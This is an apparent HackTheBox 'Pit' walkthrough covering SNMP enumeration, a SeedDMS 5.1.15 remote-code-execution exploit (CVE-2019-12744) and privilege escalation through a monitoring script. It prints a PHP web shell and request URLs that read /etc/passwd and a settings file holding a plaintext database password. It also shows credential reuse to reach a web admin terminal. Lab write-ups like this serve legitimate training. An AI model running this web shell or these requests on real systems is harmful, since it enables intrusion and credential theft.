HTB Walkthrough : Pit

Today we have another challenge from Hackthebox called “pit”. This is lab is based on exploitation of seeddms which is a free document management system with an easy to use web based user interface for small and medium sized enterprises. It is based on PHP and MySQL or sqlite3 and runs on Linux, MacOS and Windows.

Level : Medium

Attacking Strategy

  • Network Scanning
    • Masscan
    • Nmap
  • Enumeration
    • snmp service
    • user enumeration using snmp service
  • Exploitation
    • seedDMS 5.1.15 (CVE-2019-12744)
  • Privilege Escalation
    • Script not properly configure

Walkthrough

IP Address : 10.10.10.241

We start with Masscan to identify the open ports on target server . Masscan is an opensource tool for scanning .

sudo masscan -p1-65535,U:1-65535 10.10.10.241 --rate=1000 -e tun0 

Masscan result show the one UDP port is open on 161 which is by default used by SNMP services. SNMP stand for Simple Network Manager Protocol , is an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior . On same side we also get TCP service on port 22 , 80 , 9090 . We pass the result to nmap to get more information on service.

nmap -p22,80,9090 -sC -sV -oN nmap 10.10.10.241 
Nmap scan report for 10.10.10.241
Host is up (0.10s latency).

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
|   256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_  256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp   open  http            nginx 1.14.1
|_http-server-header: nginx/1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
9090/tcp open  ssl/zeus-admin?
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     Cross-Origin-Resource-Policy: same-origin
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|_    margin: 0 0 10p
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1

UDP Scan

sudo nmap -sU -p161 -sC -sV -oN nmap 10.10.10.241
Nmap scan report for 10.10.10.241
Host is up (0.096s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 4ca7e41263c5985e00000000
|   snmpEngineBoots: 73
|_  snmpEngineTime: 1d12h26m49s
| snmp-processes: 
|   1: 
|     Name: systemd
|   2: 
|     Name: kthreadd
|   3: 
|     Name: rcu_gp
|   4: 
|     Name: rcu_par_gp
|   6: 
|     Name: kworker/0:0H-events_highpri
|   9: 
|     Name: mm_percpu_wq
|.......
| snmp-sysdescr: Linux pit.htb 4.18.0-305.10.2.el8_4.x86_64 #1 SMP Tue Jul 20 17:25:16 UTC 2021 x86_64
|_  System uptime: 1d12h26m49.02s (13120902 timeticks)
Service Info: Host: pit.htb

From the nmap result we got some more information about the services running on target, nmap also reveal another subdomain i.e dms-pit.htb , and much more . After nmap we start enumeration on SNMP service therefor we start with snmp-check tool .

snmp-check 10.10.10.241
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.10.10.241:161 using SNMPv1 and community 'public'

[*] System information:

  Host IP address               : 10.10.10.241
  Hostname                      : pit.htb
  Description                   : Linux pit.htb 4.18.0-305.10.2.el8_4.x86_64 #1 SMP Tue Jul 20 17:25:16 UTC 2021 x86_64
  Contact                       : Root <[email protected]> (configure /etc/snmp/snmp.local.conf)
  Location                      : Unknown (edit /etc/snmp/snmpd.conf)
  Uptime snmp                   : 1 day, 12:40:42.34
  Uptime system                 : 1 day, 12:40:10.90
  System date                   : -

snmp_check is an open source project which is preinstalled on Kali , result show some information like we can enumerate with public string , in snmp The SNMP Community string is like a user id or password that allows access to a router’s or other device’s statistics. IPCheck Server Monitor sends the community string along with all SNMP requests. If the community string is correct, the device responds with the requested information.

For more in depth enumeration we go with different tool which is available on GitHub.

git clone https://github.com/dheiland-r7/snmp
cd snmp 
sudo apt-get install snmp
sudo cpan -i NetAddr::IP
./snmpbw.pl pit.htb public 2 1

After running the script we got the log , after reading logs we got something good i.e we get to know about seeddms is on server with some binary information , script also reveals some usernames also .

Now we know the username but where we can use it ? We also discover some service on port 80 and port 9090 . On port 80 its a default landing page of ngnix server.

When we visit to port 9090 there is login portal . After searching on internet and reading some blogs this is some kind of web GUI for administrator to control server over web application .

here we try some default credentials like admin:admin,admin:password,after trying some combination we also try “michelle:michelle” but didn’t get any success . After some enumeration we visit to subdomain and try to visit the seeddms there .

http://dms-pit.htb/seeddms51x/seeddms 

here we got the login portal when we try ” michelle:michelle” we are in there we see some announcements from administrator .

There is message from administrator that seeddms is upgraded to 5.1.15 , after doing some google seeddms is vulnerable to remote code execution we got more details exploitdb . Exploit shows the steps to be produced to abuse this vulnerability for that we need to add document and upload the payload .

<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>

After successful upload of payload note down the document id in our case i.e 30

one the payload is successfully uploaded we can access the payload by visiting .For more read exploit from exploitdb.

http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=cat+/etc/passwd

now we have RCE on server we try to collect some information after some time we are able to dump config file in which credentials for database are there in plain text.

http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=ls%20/var/www/html/seeddms51x/conf/
http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=cat%20/var/www/html/seeddms51x/conf/settings.xml
<!--
       - dbDriver: DB-Driver used by adodb (see adodb-readme)
       - dbHostname: DB-Server
       - dbDatabase: database where the tables for seeddms are stored (optional - see adodb-readme)
       - dbUser: username for database-access
       - dbPass: password for database-access
-->    
    <database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="ied^ieY6xoquu" doNotCheckVersion="false">
    </database>

from setting.xml we got the username and password now we have two username dbUser,michelle and password “ied^ieY6xoquu” .Now we can make login on port 9090 with valid credentials “michelle:ied^ieY6xoquu” after making successful login to portal we have terminal access to server.

Privilege Escalation

Now we got initial access to server its time to get root so we start enumerating more on server and try to find anything like config files , any password file ,etc on the same time we also check for sudoers, SUID bit , etc. but nothing on hand.

From the result of snmp we know some monitor script is there , so we start with this . This is an executable bash script which is simply running the file under /usr/local/monitoring .

Now to exploit this we simply create bash script with name check.sh under /usr/local/monitoring/ in which we simply trying to do password-less login to server . For more read here.

Once the check.sh is place under /usr/local/monitoring we need to trigger the script by making snmp request.

sudo apt-get install snmp-mibs-downloader
snmpwalk -m +MY-MIB -v2c -c public 10.10.10.241 nsExtendObjects
ssh -i id_rsa [email protected]

If everything is good then simply make a ssh login with root user using private key and collect the flags.

References

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.